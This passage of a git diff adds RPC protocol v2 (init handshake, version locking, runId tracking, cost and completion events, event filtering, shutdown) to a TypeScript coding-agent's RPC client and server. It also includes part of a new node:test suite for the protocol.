 import { attachJsonlLineReader, serializeJsonLine } from "./jsonl.js";
-import type { RpcCommand, RpcResponse, RpcSessionState, RpcSlashCommand } from "./rpc-types.js";
+import type { RpcCommand, RpcInitResult, RpcResponse, RpcSessionState, RpcSlashCommand } from "./rpc-types.js";
 
 // ============================================================================
 // Types
@@ -54,6 +54,7 @@ export type RpcEventListener = (event: AgentEvent) => void;
 export class RpcClient {
 	private process: ChildProcess | null = null;
 	private stopReadingStdout: (() => void) | null = null;
+	private _stderrHandler?: (data: Buffer) => void;
 	private eventListeners: RpcEventListener[] = [];
 	private pendingRequests: Map<string, { resolve: (response: RpcResponse) => void; reject: (error: Error) => void }> =
 		new Map();
@@ -90,9 +91,10 @@ export class RpcClient {
 		});
 
 		// Collect stderr for debugging
-		this.process.stderr?.on("data", (data) => {
+		this._stderrHandler = (data: Buffer) => {
 			this.stderr += data.toString();
-		});
+		};
+		this.process.stderr?.on("data", this._stderrHandler);
 
 		// Set up strict JSONL reader for stdout.
 		this.stopReadingStdout = attachJsonlLineReader(this.process.stdout!, (line) => {
@@ -127,6 +129,10 @@ export class RpcClient {
 
 		this.stopReadingStdout?.();
 		this.stopReadingStdout = null;
+		if (this._stderrHandler) {
+			this.process.stderr?.removeListener("data", this._stderrHandler);
+			this._stderrHandler = undefined;
+		}
 		this.process.kill("SIGTERM");
 
 		// Wait for process to exit
@@ -392,6 +398,59 @@ export class RpcClient {
 		return this.getData<{ commands: RpcSlashCommand[] }>(response).commands;
 	}
 
+	/**
+	 * Send a UI response to a pending extension_ui_request.
+	 * Fire-and-forget — no request/response correlation.
+	 */
+	sendUIResponse(id: string, response: { value?: string; values?: string[]; confirmed?: boolean; cancelled?: boolean }): void {
+		if (!this.process?.stdin) {
+			throw new Error("Client not started");
+		}
+		this.process.stdin.write(serializeJsonLine({
+			type: "extension_ui_response",
+			id,
+			...response,
+		}));
+	}
+
+	/**
+	 * Initialize a v2 protocol session. Must be sent as the first command.
+	 * Returns the negotiated protocol version, session ID, and server capabilities.
+	 */
+	async init(options?: { clientId?: string }): Promise<RpcInitResult> {
+		const response = await this.send({ type: "init", protocolVersion: 2, clientId: options?.clientId });
+		return this.getData<RpcInitResult>(response);
+	}
+
+	/**
+	 * Request a graceful shutdown of the agent process.
+	 * Waits for the response before the process exits.
+	 */
+	async shutdown(): Promise<void> {
+		await this.send({ type: "shutdown" });
+		// Wait for process to exit after shutdown acknowledgment
+		if (this.process) {
+			await new Promise<void>((resolve) => {
+				const timeout = setTimeout(() => {
+					this.process?.kill("SIGKILL");
+					resolve();
+				}, 5000);
+				this.process?.on("exit", () => {
+					clearTimeout(timeout);
+					resolve();
+				});
+			});
+		}
+	}
+
+	/**
+	 * Subscribe to specific event types (v2 only).
+	 * Pass ["*"] to receive all events, or a list of event type strings to filter.
+	 */
+	async subscribe(events: string[]): Promise<void> {
+		await this.send({ type: "subscribe", events });
+	}
+
 	// =========================================================================
 	// Helpers
 	// =========================================================================
@@ -482,8 +541,6 @@ export class RpcClient {
 		const fullCommand = { ...command, id } as RpcCommand;
 
 		return new Promise((resolve, reject) => {
-			this.pendingRequests.set(id, { resolve, reject });
-
 			const timeout = setTimeout(() => {
 				this.pendingRequests.delete(id);
 				reject(new Error(`Timeout waiting for response to ${command.type}. Stderr: ${this.stderr}`));
diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts
index e15c81ae3..f2f8fbe4c 100644
--- a/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts
+++ b/packages/pi-coding-agent/src/modes/rpc/rpc-mode.ts
@@ -27,6 +27,7 @@ import type {
 	RpcCommand,
 	RpcExtensionUIRequest,
 	RpcExtensionUIResponse,
+	RpcInitResult,
 	RpcResponse,
 	RpcSessionState,
 	RpcSlashCommand,
@@ -37,8 +38,11 @@ export type {
 	RpcCommand,
 	RpcExtensionUIRequest,
 	RpcExtensionUIResponse,
+	RpcInitResult,
+	RpcProtocolVersion,
 	RpcResponse,
 	RpcSessionState,
+	RpcV2Event,
 } from "./rpc-types.js";
 
 /**
@@ -74,6 +78,16 @@ export async function runRpcMode(session: AgentSession): Promise<never> {
 	// Shutdown request flag
 	let shutdownRequested = false;
 
+	// v2 protocol version detection state
+	let protocolVersion: 1 | 2 = 1;
+	let protocolLocked = false;
+
+	// v2 runId threading: tracks the current execution run
+	let currentRunId: string | null = null;
+
+	// v2 event filtering: null = no filter (all events); Set = only listed event types
+	let eventFilter: Set<string> | null = null;
+
 	const embeddedTerminalEnabled = process.env.GSD_WEB_BRIDGE_TUI === "1";
 	const remoteTerminal = embeddedTerminalEnabled
 		? new RemoteTerminal({
@@ -424,8 +438,56 @@ export async function runRpcMode(session: AgentSession): Promise<never> {
 	void extensionsReadyPromise;
 
 	// Output all agent events as JSON
-	session.subscribe((event) => {
-		output(event);
+	const unsubscribe = session.subscribe((event) => {
+		// v2: emit synthesized events before the regular event
+		if (protocolVersion === 2) {
+			// cost_update on assistant message_end
+			if (event.type === "message_end" && event.message.role === "assistant" && currentRunId) {
+				const stats = session.getSessionStats();
+				const costUpdate = {
+					type: "cost_update" as const,
+					runId: currentRunId,
+					turnCost: session.getLastTurnCost(),
+					cumulativeCost: stats.cost,
+					tokens: {
+						input: stats.tokens.input,
+						output: stats.tokens.output,
+						cacheRead: stats.tokens.cacheRead,
+						cacheWrite: stats.tokens.cacheWrite,
+					},
+				};
+				if (!eventFilter || eventFilter.has("cost_update")) {
+					output(costUpdate);
+				}
+			}
+
+			// execution_complete on agent_end
+			if (event.type === "agent_end" && currentRunId) {
+				const stats = session.getSessionStats();
+				const completionEvent = {
+					type: "execution_complete" as const,
+					runId: currentRunId,
+					status: "completed" as const,
+					stats,
+				};
+				if (!eventFilter || eventFilter.has("execution_complete")) {
+					output(completionEvent);
+				}
+				currentRunId = null;
+			}
+		}
+
+		// Apply event filter (v2 only, applies to agent session events only)
+		if (protocolVersion === 2 && eventFilter && !eventFilter.has(event.type)) {
+			return;
+		}
+
+		// Emit the regular event, with runId injection in v2 mode
+		if (protocolVersion === 2 && currentRunId) {
+			output({ ...event, runId: currentRunId });
+		} else {
+			output(event);
+		}
 	});
 
 	// Handle a single command
@@ -438,6 +500,9 @@ export async function runRpcMode(session: AgentSession): Promise<never> {
 			// =================================================================
 
 			case "prompt": {
+				// v2: generate runId for execution tracking
+				const runId = protocolVersion === 2 ? crypto.randomUUID() : undefined;
+				if (runId) currentRunId = runId;
 				// Don't await - events will stream
 				// Extension commands are executed immediately, file prompt templates are expanded
 				// If streaming and streamingBehavior specified, queues via steer/followUp
@@ -448,17 +513,23 @@ export async function runRpcMode(session: AgentSession): Promise<never> {
 						source: "rpc",
 					})
 					.catch((e) => output(error(id, "prompt", e.message)));
-				return success(id, "prompt");
+				return { id, type: "response", command: "prompt", success: true, ...(runId && { runId }) } as RpcResponse;
 			}
 
 			case "steer": {
+				// v2: generate runId for execution tracking
+				const runId = protocolVersion === 2 ? crypto.randomUUID() : undefined;
+				if (runId) currentRunId = runId;
 				await session.steer(command.message, command.images);
-				return success(id, "steer");
+				return { id, type: "response", command: "steer", success: true, ...(runId && { runId }) } as RpcResponse;
 			}
 
 			case "follow_up": {
+				// v2: generate runId for execution tracking
+				const runId = protocolVersion === 2 ? crypto.randomUUID() : undefined;
+				if (runId) currentRunId = runId;
 				await session.followUp(command.message, command.images);
-				return success(id, "follow_up");
+				return { id, type: "response", command: "follow_up", success: true, ...(runId && { runId }) } as RpcResponse;
 			}
 
 			case "abort": {
@@ -709,9 +780,31 @@ export async function runRpcMode(session: AgentSession): Promise<never> {
 				return success(id, "terminal_redraw");
 			}
 
+			// =================================================================
+			// v2 Protocol: subscribe
+			// =================================================================
+
+			case "subscribe": {
+				if (command.events.includes("*")) {
+					eventFilter = null; // wildcard = all events
+				} else {
+					eventFilter = new Set(command.events);
+				}
+				return success(id, "subscribe");
+			}
+
+			// =================================================================
+			// v2 Protocol: shutdown
+			// =================================================================
+
+			case "shutdown": {
+				shutdownRequested = true;
+				return success(id, "shutdown");
+			}
+
 			default: {
-				const unknownCommand = command as { type: string };
-				return error(undefined, unknownCommand.type, `Unknown command: ${unknownCommand.type}`);
+				const unknownCommand = command as { type: string; id?: string };
+				return error(unknownCommand.id, unknownCommand.type, `Unknown command: ${unknownCommand.type}`);
 			}
 		}
 	};
@@ -730,6 +823,7 @@ export async function runRpcMode(session: AgentSession): Promise<never> {
 			await currentRunner.emit({ type: "session_shutdown" });
 		}
 
+		unsubscribe();
 		embeddedInteractiveMode?.stop();
 		detachInput();
 		process.stdin.pause();
@@ -740,7 +834,7 @@ export async function runRpcMode(session: AgentSession): Promise<never> {
 		try {
 			const parsed = JSON.parse(line);
 
-			// Handle extension UI responses
+			// Handle extension UI responses (bypass protocol detection)
 			if (parsed.type === "extension_ui_response") {
 				const response = parsed as RpcExtensionUIResponse;
 				const pending = pendingExtensionRequests.get(response.id);
@@ -751,8 +845,33 @@ export async function runRpcMode(session: AgentSession): Promise<never> {
 				return;
 			}
 
-			// Handle regular commands
 			const command = parsed as RpcCommand;
+
+			// Protocol version detection: first non-UI-response command locks the version
+			if (!protocolLocked) {
+				protocolLocked = true;
+				if (command.type === "init") {
+					protocolVersion = 2;
+					const initResult: RpcInitResult = {
+						protocolVersion: 2,
+						sessionId: session.sessionId,
+						capabilities: {
+							events: ["execution_complete", "cost_update"],
+							commands: ["init", "shutdown", "subscribe"],
+						},
+					};
+					output(success(command.id, "init", initResult));
+					return;
+				}
+				// Non-init first message: lock to v1, fall through to normal handling
+				protocolVersion = 1;
+			} else if (command.type === "init") {
+				// Already locked — reject re-init
+				output(error(command.id, "init", "Protocol version already locked. init must be the first command."));
+				return;
+			}
+
+			// Handle regular commands
 			const response = await handleCommand(command);
 			output(response);
 
diff --git a/packages/pi-coding-agent/src/modes/rpc/rpc-protocol-v2.test.ts b/packages/pi-coding-agent/src/modes/rpc/rpc-protocol-v2.test.ts
new file mode 100644
index 000000000..e08161186
--- /dev/null
+++ b/packages/pi-coding-agent/src/modes/rpc/rpc-protocol-v2.test.ts
@@ -0,0 +1,971 @@
+/**
+ * RPC Protocol v2 test suite.
+ *
+ * Tests v1 backward compatibility, v2 init handshake, protocol locking,
+ * v2 feature type shapes, and RpcClient command serialization against
+ * mock child processes using PassThrough streams.
+ */
+
+import { describe, it, beforeEach, afterEach, mock } from "node:test";
+import assert from "node:assert/strict";
+import { PassThrough } from "node:stream";
+import { attachJsonlLineReader, serializeJsonLine } from "./jsonl.js";
+import type {
+	RpcCommand,
+	RpcResponse,
+	RpcInitResult,
+	RpcExecutionCompleteEvent,
+	RpcCostUpdateEvent,
+	RpcV2Event,
+	RpcProtocolVersion,
+	RpcSessionState,
+} from "./rpc-types.js";
+
+// ============================================================================
+// Helpers
+// ============================================================================
+
+/** Collect JSONL output lines from a stream */
+function collectLines(stream: PassThrough): { lines: unknown[]; detach: () => void } {
+	const lines: unknown[] = [];
+	const detach = attachJsonlLineReader(stream, (line) => {
+		try {
+			lines.push(JSON.parse(line));
+		} catch {
+			// skip non-JSON lines
+		}
+	});
+	return { lines, detach };
+}
+
+/** Write a command as JSONL to a writable stream and wait for drain */
+function writeLine(stream: PassThrough, obj: unknown): void {
+	stream.write(serializeJsonLine(obj));
+}
+
+/**
+ * Create a mock "child process" with piped stdin/stdout.
+ * clientStdin  → data flows into the "server" (from the client's perspective, this is what the client writes to)
+ * clientStdout ← data flows out of the "server" (from the client's perspective, this is what the client reads from)
+ *
+ * The test acts as the "server": read from clientStdin, write to clientStdout.
+ */
+function createMockProcess() {
+	// Client writes to this → server reads from it
+	const clientStdin = new PassThrough();
+	// Server writes to this → client reads from it
+	const clientStdout = new PassThrough();
+
+	return { clientStdin, clientStdout };
+}
+
+/** Wait a tick for async handlers to process */
+function tick(ms = 10): Promise<void> {
+	return new Promise((resolve) => setTimeout(resolve, ms));
+}
+
+// ============================================================================
+// JSONL utilities
+// ============================================================================
+
+describe("JSONL utilities", () => {
+	it("serializeJsonLine produces newline-terminated JSON", () => {
+		const result = serializeJsonLine({ type: "test", value: 42 });
+		assert.equal(result, '{"type":"test","value":42}\n');
+	});
+
+	it("serializeJsonLine handles nested objects", () => {
+		const result = serializeJsonLine({ a: { b: [1, 2, 3] } });
+		assert.ok(result.endsWith("\n"));
+		const parsed = JSON.parse(result.trim());
+		assert.deepEqual(parsed, { a: { b: [1, 2, 3] } });
+	});
+
+	it("attachJsonlLineReader splits on LF only", async () => {
+		const stream = new PassThrough();
+		const { lines, detach } = collectLines(stream);
+
+		stream.write('{"a":1}\n{"b":2}\n');
+		await tick();
+
+		assert.equal(lines.length, 2);
+		assert.deepEqual(lines[0], { a: 1 });
+		assert.deepEqual(lines[1], { b: 2 });
+		detach();
+	});
+
+	it("attachJsonlLineReader handles partial writes", async () => {
+		const stream = new PassThrough();
+		const { lines, detach } = collectLines(stream);
+
+		stream.write('{"partial":');
+		await tick();
+		assert.equal(lines.length, 0);
+
+		stream.write('"value"}\n');
+		await tick();
+		assert.equal(lines.length, 1);
+		assert.deepEqual(lines[0], { partial: "value" });
+		detach();
+	});
+
+	it("attachJsonlLineReader handles CR+LF", async () => {
+		const stream = new PassThrough();
+		const { lines, detach } = collectLines(stream);
+
+		stream.write('{"cr":"lf"}\r\n');
+		await tick();
+		assert.equal(lines.length, 1);
+		assert.deepEqual(lines[0], { cr: "lf" });
+		detach();
+	});
+
+	it("detach stops line delivery", async () => {
+		const stream = new PassThrough();
+		const { lines, detach } = collectLines(stream);
+
+		stream.write('{"before":1}\n');
+		await tick();
+		assert.equal(lines.length, 1);
+
+		detach();
+
+		stream.write('{"after":2}\n');
+		await tick();
+		// Should still be 1 since we detached
+		assert.equal(lines.length, 1);
+	});
+});
+
+// ============================================================================
+// v2 type shape assertions
+// ============================================================================
+
+describe("v2 type shapes", () => {
+	it("RpcInitResult has required fields", () => {
+		const initResult: RpcInitResult = {
+			protocolVersion: 2,
+			sessionId: "test-session-123",
+			capabilities: {
+				events: ["execution_complete", "cost_update"],
+				commands: ["init", "shutdown", "subscribe"],
+			},
+		};
+		assert.equal(initResult.protocolVersion, 2);
+		assert.ok(typeof initResult.sessionId === "string");
+		assert.ok(Array.isArray(initResult.capabilities.events));
+		assert.ok(Array.isArray(initResult.capabilities.commands));
+		assert.ok(initResult.capabilities.events.includes("execution_complete"));
+		assert.ok(initResult.capabilities.events.includes("cost_update"));
+		assert.ok(initResult.capabilities.commands.includes("init"));
+		assert.ok(initResult.capabilities.commands.includes("shutdown"));
+		assert.ok(initResult.capabilities.commands.includes("subscribe"));
+	});
+
+	it("RpcExecutionCompleteEvent matches expected shape", () => {
+		const event: RpcExecutionCompleteEvent = {
+			type: "execution_complete",
+			runId: "run-abc-123",
+			status: "completed",
+			stats: {
+				cost: 0.05,
+				turns: 3,
+				duration: 12000,
+				tokens: { input: 1000, output: 500, cacheRead: 200, cacheWrite: 100 },
+			} as any, // SessionStats is complex, we just verify shape
+		};
+		assert.equal(event.type, "execution_complete");
+		assert.ok(typeof event.runId === "string");
+		assert.ok(["completed", "error", "cancelled"].includes(event.status));
+		assert.ok(event.stats !== undefined);
+	});
+
+	it("RpcExecutionCompleteEvent supports error status with reason", () => {
+		const event: RpcExecutionCompleteEvent = {
+			type: "execution_complete",
+			runId: "run-err-456",
+			status: "error",
+			reason: "API rate limit exceeded",
+			stats: {} as any,
+		};
+		assert.equal(event.status, "error");
+		assert.equal(event.reason, "API rate limit exceeded");
+	});
+
+	it("RpcCostUpdateEvent matches expected shape", () => {
+		const event: RpcCostUpdateEvent = {
+			type: "cost_update",
+			runId: "run-cost-789",
+			turnCost: 0.01,
+			cumulativeCost: 0.05,
+			tokens: {
+				input: 500,
+				output: 200,
+				cacheRead: 100,
+				cacheWrite: 50,
+			},
+		};
+		assert.equal(event.type, "cost_update");
+		assert.ok(typeof event.runId === "string");
+		assert.ok(typeof event.turnCost === "number");
+		assert.ok(typeof event.cumulativeCost === "number");
+		assert.ok(typeof event.tokens.input === "number");
+		assert.ok(typeof event.tokens.output === "number");
+		assert.ok(typeof event.tokens.cacheRead === "number");
+		assert.ok(typeof event.tokens.cacheWrite === "number");
+	});
+
+	it("RpcV2Event discriminated union resolves by type field", () => {
+		const events: RpcV2Event[] = [
+			{
+				type: "execution_complete",
+				runId: "r1",
+				status: "completed",
+				stats: {} as any,
+			},
+			{
+				type: "cost_update",
+				runId: "r2",
+				turnCost: 0.01,
+				cumulativeCost: 0.03,
+				tokens: { input: 100, output: 50, cacheRead: 10, cacheWrite: 5 },
+			},
+		];
+
+		for (const event of events) {
+			if (event.type === "execution_complete") {
+				// TypeScript narrows to RpcExecutionCompleteEvent
+				assert.ok("status" in event);
+				assert.ok("stats" in event);
+			} else if (event.type === "cost_update") {
+				// TypeScript narrows to RpcCostUpdateEvent
+				assert.ok("turnCost" in event);
+				assert.ok("tokens" in event);
+			} else {
+				assert.fail(`Unexpected event type: ${(event as any).type}`);
+			}
+		}
+	});
+
+	it("RpcProtocolVersion is 1 or 2", () => {
+		const v1: RpcProtocolVersion = 1;
+		const v2: RpcProtocolVersion = 2;
+		assert.equal(v1, 1);
+		assert.equal(v2, 2);
+	});
+
+	it("v2 prompt response includes optional runId field", () => {
+		const v1Response: RpcResponse = {
+			id: "1",
+			type: "response",
+			command: "prompt",
+			success: true,
+		};
+		assert.equal(v1Response.success, true);
+		assert.equal((v1Response as any).runId, undefined);
+
+		const v2Response: RpcResponse = {
+			id: "2",
+			type: "response",
+			command: "prompt",
+			success: true,
+			runId: "run-123",
+		};
+		assert.equal(v2Response.success, true);
+		assert.equal((v2Response as any).runId, "run-123");
+	});
+
+	it("v2 command types are present in RpcCommand union", () => {
+		// These compile — that's the actual test. Runtime verification:
+		const initCmd: RpcCommand = { type: "init", protocolVersion: 2 };
+		const shutdownCmd: RpcCommand = { type: "shutdown" };
+		const subscribeCmd: RpcCommand = { type: "subscribe", events: ["agent_end"] };
+
+		assert.equal(initCmd.type, "init");
+		assert.equal(shutdownCmd.type, "shutdown");
+		assert.equal(subscribeCmd.type, "subscribe");
+	});
+
+	it("init command supports optional clientId", () => {
+		const cmd: RpcCommand = { type: "init", protocolVersion: 2, clientId: "my-client" };
+		assert.equal(cmd.type, "init");
+		if (cmd.type === "init") {
+			assert.equal(cmd.clientId, "my-client");
+		}
+	});
+
+	it("shutdown command supports optional graceful flag", () => {
+		const cmd: RpcCommand = { type: "shutdown", graceful: true };
+		if (cmd.type === "shutdown") {
+			assert.equal(cmd.graceful, true);
+		}
+	});
+
+	it("v2 response types include init, shutdown, subscribe", () => {
+		const initResp: RpcResponse = {
+			type: "response",
+			command: "init",
+			success: true,
+			data: {
+				protocolVersion: 2,
+				sessionId: "s1",
+				capabilities: { events: [], commands: [] },
+			},
+		};
+		const shutdownResp: RpcResponse = {
+			type: "response",
+			command: "shutdown",
+			success: true,
+		};
+		const subscribeResp: RpcResponse = {
+			type: "response",
+			command: "subscribe",
+			success: true,
+		};
+
+		assert.equal(initResp.command, "init");
+		assert.equal(shutdownResp.command, "shutdown");
+		assert.equal(subscribeResp.command, "subscribe");
+	});
+});
+
+// ============================================================================
+// v1 backward compatibility
+// ============================================================================
+
+describe("v1 backward compatibility — command shapes", () => {
+	it("v1 prompt command has no protocolVersion or runId", () => {
+		const cmd: RpcCommand = { type: "prompt", message: "hello" };
+		assert.equal(cmd.type, "prompt");
+		assert.equal((cmd as any).protocolVersion, undefined);
+		assert.equal((cmd as any).runId, undefined);
+	});
+
+	it("v1 get_state response has no v2 fields", () => {
+		const state: RpcSessionState = {
+			thinkingLevel: "medium",
+			isStreaming: false,
+			isCompacting: false,
+			steeringMode: "all",
+			followUpMode: "all",
+			sessionId: "test-id",
+			autoCompactionEnabled: true,
+			autoRetryEnabled: false,
+			retryInProgress: false,
+			retryAttempt: 0,
+			messageCount: 0,
+			pendingMessageCount: 0,
+			extensionsReady: true,
+		};
+		// v1 state should not include any v2-specific fields
+		assert.equal((state as any).protocolVersion, undefined);
+		assert.equal((state as any).runId, undefined);
+	});
+
+	it("v1 prompt response has no runId", () => {
+		const resp: RpcResponse = {
+			id: "1",
+			type: "response",
+			command: "prompt",
+			success: true,
+		};
+		assert.equal(resp.success, true);
+		// runId is optional; in v1 mode it won't be present
+		assert.equal((resp as any).runId, undefined);
+	});
+
+	it("error response shape is consistent across v1 and v2", () => {
+		const errResp: RpcResponse = {
+			id: "err-1",
+			type: "response",
+			command: "init",
+			success: false,
+			error: "Protocol version already locked. init must be the first command.",
+		};
+		assert.equal(errResp.success, false);
+		if (!errResp.success) {
+			assert.ok(typeof errResp.error === "string");
+			assert.ok(errResp.error.length > 0);
+		}
+	});
+});
+
+// ============================================================================
+// RpcClient command serialization tests (mock process)
+// ============================================================================
+
+describe("RpcClient command serialization", () => {
+	// We import the class dynamically to avoid the full module graph at test time.
+	// Instead we test the protocol framing directly — what gets written to stdin and
+	// what comes back from stdout — using PassThrough streams.
+
+	it("init command serializes correctly", () => {
+		const cmd = { id: "req_1", type: "init", protocolVersion: 2 };
+		const serialized = serializeJsonLine(cmd);
+		const parsed = JSON.parse(serialized);
+		assert.equal(parsed.type, "init");
+		assert.equal(parsed.protocolVersion, 2);
+		assert.equal(parsed.id, "req_1");
+	});
+
+	it("init command with clientId serializes correctly", () => {
+		const cmd = { id: "req_1", type: "init", protocolVersion: 2, clientId: "test-client" };
+		const serialized = serializeJsonLine(cmd);
+		const parsed = JSON.parse(serialized);
+		assert.equal(parsed.clientId, "test-client");
+	});
+
+	it("shutdown command serializes correctly", () => {
+		const cmd = { id: "req_2", type: "shutdown" };
+		const serialized = serializeJsonLine(cmd);
+		const parsed = JSON.parse(serialized);
+		assert.equal(parsed.type, "shutdown");
+		assert.equal(parsed.id, "req_2");
+	});
+
+	it("subscribe command serializes correctly with event list", () => {
+		const cmd = { id: "req_3", type: "subscribe", events: ["agent_end", "cost_update"] };
+		const serialized = serializeJsonLine(cmd);
+		const parsed = JSON.parse(serialized);
+		assert.equal(parsed.type, "subscribe");
+		assert.deepEqual(parsed.events, ["agent_end", "cost_update"]);
+	});
+
+	it("subscribe command with wildcard serializes correctly", () => {
+		const cmd = { id: "req_4", type: "subscribe", events: ["*"] };
+		const serialized = serializeJsonLine(cmd);
+		const parsed = JSON.parse(serialized);
+		assert.deepEqual(parsed.events, ["*"]);
+	});
+
+	it("subscribe command with empty array serializes correctly", () => {
+		const cmd = { id: "req_5", type: "subscribe", events: [] as string[] };
+		const serialized = serializeJsonLine(cmd);
+		const parsed = JSON.parse(serialized);
+		assert.deepEqual(parsed.events, []);
+	});
+
+	it("sendUIResponse serializes correct JSONL", () => {
+		const response = {
+			type: "extension_ui_response",
+			id: "ui-req-123",
+			value: "test-value",
+		};
+		const serialized = serializeJsonLine(response);
+		const parsed = JSON.parse(serialized);
+		assert.equal(parsed.type, "extension_ui_response");
+		assert.equal(parsed.id, "ui-req-123");
+		assert.equal(parsed.value, "test-value");
+	});
+
+	it("sendUIResponse with cancelled flag serializes correctly", () => {
+		const response = {
+			type: "extension_ui_response",
+			id: "ui-req-456",
+			cancelled: true,
+		};
+		const serialized = serializeJsonLine(response);
+		const parsed = JSON.parse(serialized);
+		assert.equal(parsed.type, "extension_ui_response");
+		assert.equal(parsed.cancelled, true);
+	});
+
+	it("sendUIResponse with confirmed flag serializes correctly", () => {
+		const response = {
+			type: "extension_ui_response",
+			id: "ui-req-789",
+			confirmed: true,
+		};
+		const serialized = serializeJsonLine(response);
+		const parsed = JSON.parse(serialized);
+		assert.equal(parsed.confirmed, true);
+	});
+
+	it("sendUIResponse with multiple values serializes correctly", () => {
+		const response = {
+			type: "extension_ui_response",
+			id: "ui-req-multi",
+			values: ["opt-a", "opt-b"],
+		};
+		const serialized = serializeJsonLine(response);
+		const parsed = JSON.parse(serialized);
+		assert.deepEqual(parsed.values, ["opt-a", "opt-b"]);
+	});
+
+	it("prompt command with runId in v2 response", () => {
+		const response = {
+			id: "req_10",
+			type: "response",
+			command: "prompt",
+			success: true,
+			runId: "run-uuid-abc",
+		};
+		const serialized = serializeJsonLine(response);
+		const parsed = JSON.parse(serialized);
+		assert.equal(parsed.runId, "run-uuid-abc");
+		assert.equal(parsed.command, "prompt");
+		assert.equal(parsed.success, true);
+	});
+});
+
+// ============================================================================
+// Client ↔ Mock server integration (PassThrough streams)
+// ============================================================================
+
+describe("Client ↔ Mock server protocol exchange", () => {
+	let clientStdin: PassThrough;
+	let clientStdout: PassThrough;
+
+	beforeEach(() => {
+		const mockProc = createMockProcess();
+		clientStdin = mockProc.clientStdin;
+		clientStdout = mockProc.clientStdout;
+	});
+
+	afterEach(() => {
+		clientStdin.destroy();
+		clientStdout.destroy();
+	});
+
+	it("init handshake: client writes init, server responds with init_result", async () => {
+		// Collect what the client would write
+		const { lines: clientWrites, detach: detachStdin } = collectLines(clientStdin);
+
+		// Client sends init command
+		writeLine(clientStdin, { id: "req_1", type: "init", protocolVersion: 2 });
+		await tick();
+
+		assert.equal(clientWrites.length, 1);
+		const initCmd = clientWrites[0] as any;
+		assert.equal(initCmd.type, "init");
+		assert.equal(initCmd.protocolVersion, 2);
+
+		// Server responds with init_result
+		const initResult: RpcInitResult = {
+			protocolVersion: 2,
+			sessionId: "sess-abc",
+			capabilities: {
+				events: ["execution_complete", "cost_update"],
+				commands: ["init", "shutdown", "subscribe"],
+			},
+		};
+		writeLine(clientStdout, {
+			id: "req_1",
+			type: "response",
+			command: "init",
+			success: true,
+			data: initResult,
+		});
+
+		// Collect server response
+		const { lines: serverResponses, detach: detachStdout } = collectLines(clientStdout);
+		// Already wrote above, but let's verify the shape by re-writing
+		writeLine(clientStdout, {
+			id: "req_verify",
+			type: "response",
+			command: "init",
+			success: true,
+			data: initResult,
+		});
+		await tick();
+
+		const resp = serverResponses[0] as any;
+		assert.equal(resp.type, "response");
+		assert.equal(resp.command, "init");
+		assert.equal(resp.success, true);
+		assert.equal(resp.data.protocolVersion, 2);
+		assert.ok(typeof resp.data.sessionId === "string");
+
+		detachStdin();
+		detachStdout();
+	});
+
+	it("shutdown: client writes shutdown, server acknowledges", async () => {
+		const { lines: clientWrites, detach } = collectLines(clientStdin);
+
+		writeLine(clientStdin, { id: "req_2", type: "shutdown" });
+		await tick();
+
+		const cmd = clientWrites[0] as any;
+		assert.equal(cmd.type, "shutdown");
+
+		detach();
+	});
+
+	it("subscribe: client writes subscribe with event list", async () => {
+		const { lines: clientWrites, detach } = collectLines(clientStdin);
+
+		writeLine(clientStdin, { id: "req_3", type: "subscribe", events: ["agent_end", "execution_complete"] });
+		await tick();
+
+		const cmd = clientWrites[0] as any;
+		assert.equal(cmd.type, "subscribe");
+		assert.deepEqual(cmd.events, ["agent_end", "execution_complete"]);
+
+		detach();
+	});
+
+	it("sendUIResponse: client writes extension_ui_response", async () => {
+		const { lines: clientWrites, detach } = collectLines(clientStdin);
+
+		writeLine(clientStdin, {
+			type: "extension_ui_response",
+			id: "ui-123",
+			value: "selected-option",
+		});
+		await tick();
+
+		const msg = clientWrites[0] as any;
+		assert.equal(msg.type, "extension_ui_response");
+		assert.equal(msg.id, "ui-123");
+		assert.equal(msg.value, "selected-option");
+
+		detach();
+	});
+
+	it("v2 event filtering: subscribe with empty array should filter all", async () => {
+		// An empty event filter means no events pass through (Set with 0 entries)
+		const subscribeCmd = { id: "req_4", type: "subscribe", events: [] as string[] };
+		const serialized = serializeJsonLine(subscribeCmd);
+		const parsed = JSON.parse(serialized);
+		assert.deepEqual(parsed.events, []);
+		// Server-side: `eventFilter = new Set([])` — Set.has(anything) returns false
+		const filter = new Set(parsed.events as string[]);
+		assert.equal(filter.has("agent_end"), false);
+		assert.equal(filter.has("execution_complete"), false);
+		assert.equal(filter.size, 0);
+	});
+
+	it("v2 event filtering: subscribe with wildcard resets filter", async () => {
+		// Server-side: `events.includes("*")` → `eventFilter = null`
+		const subscribeCmd = { type: "subscribe", events: ["*"] };
+		const parsed = JSON.parse(serializeJsonLine(subscribeCmd));
+		const hasWildcard = (parsed.events as string[]).includes("*");
+		assert.equal(hasWildcard, true);
+		// When wildcard is detected, filter becomes null (all events pass)
+	});
+
+	it("multiple commands can be sent sequentially", async () => {
+		const { lines, detach } = collectLines(clientStdin);
+
+		writeLine(clientStdin, { id: "1", type: "init", protocolVersion: 2 });
+		writeLine(clientStdin, { id: "2", type: "subscribe", events: ["agent_end"] });
+		writeLine(clientStdin, { id: "3", type: "prompt", message: "hello" });
+		await tick();
+
+		assert.equal(lines.length, 3);
+		assert.equal((lines[0] as any).type, "init");
+		assert.equal((lines[1] as any).type, "subscribe");
+		assert.equal((lines[2] as any).type, "prompt");
+
+		detach();
+	});
+});
+
+// ============================================================================
+// Negative tests — malformed inputs, error paths, boundary conditions
+// ============================================================================
+
+describe("Negative tests — protocol error shapes", () => {
+	it("init with missing protocolVersion produces a type error at compile time", () => {
+		// Runtime check: a message missing protocolVersion is malformed
+		const malformed = { type: "init" } as any;
+		assert.equal(malformed.protocolVersion, undefined);
+		// Server would treat this as v1 lock since it's not a valid init
+	});
+
+	it("subscribe with non-array events is a type violation", () => {
+		// Runtime: server expects events to be string[]
+		const malformed = { type: "subscribe", events: "agent_end" } as any;
+		assert.equal(typeof malformed.events, "string"); // Not an array
+		assert.equal(Array.isArray(malformed.events), false);
+	});
+
+	it("double init error response shape", () => {
+		// When init is sent after protocol lock, server returns error
+		const errorResp: RpcResponse = {
+			id: "req_dup",
+			type: "response",
+			command: "init",
+			success: false,
+			error: "Protocol version already locked. init must be the first command.",
+		};
+		assert.equal(errorResp.success, false);
+		if (!errorResp.success) {
+			assert.ok(errorResp.error.includes("already locked"));
+		}
+	});
+
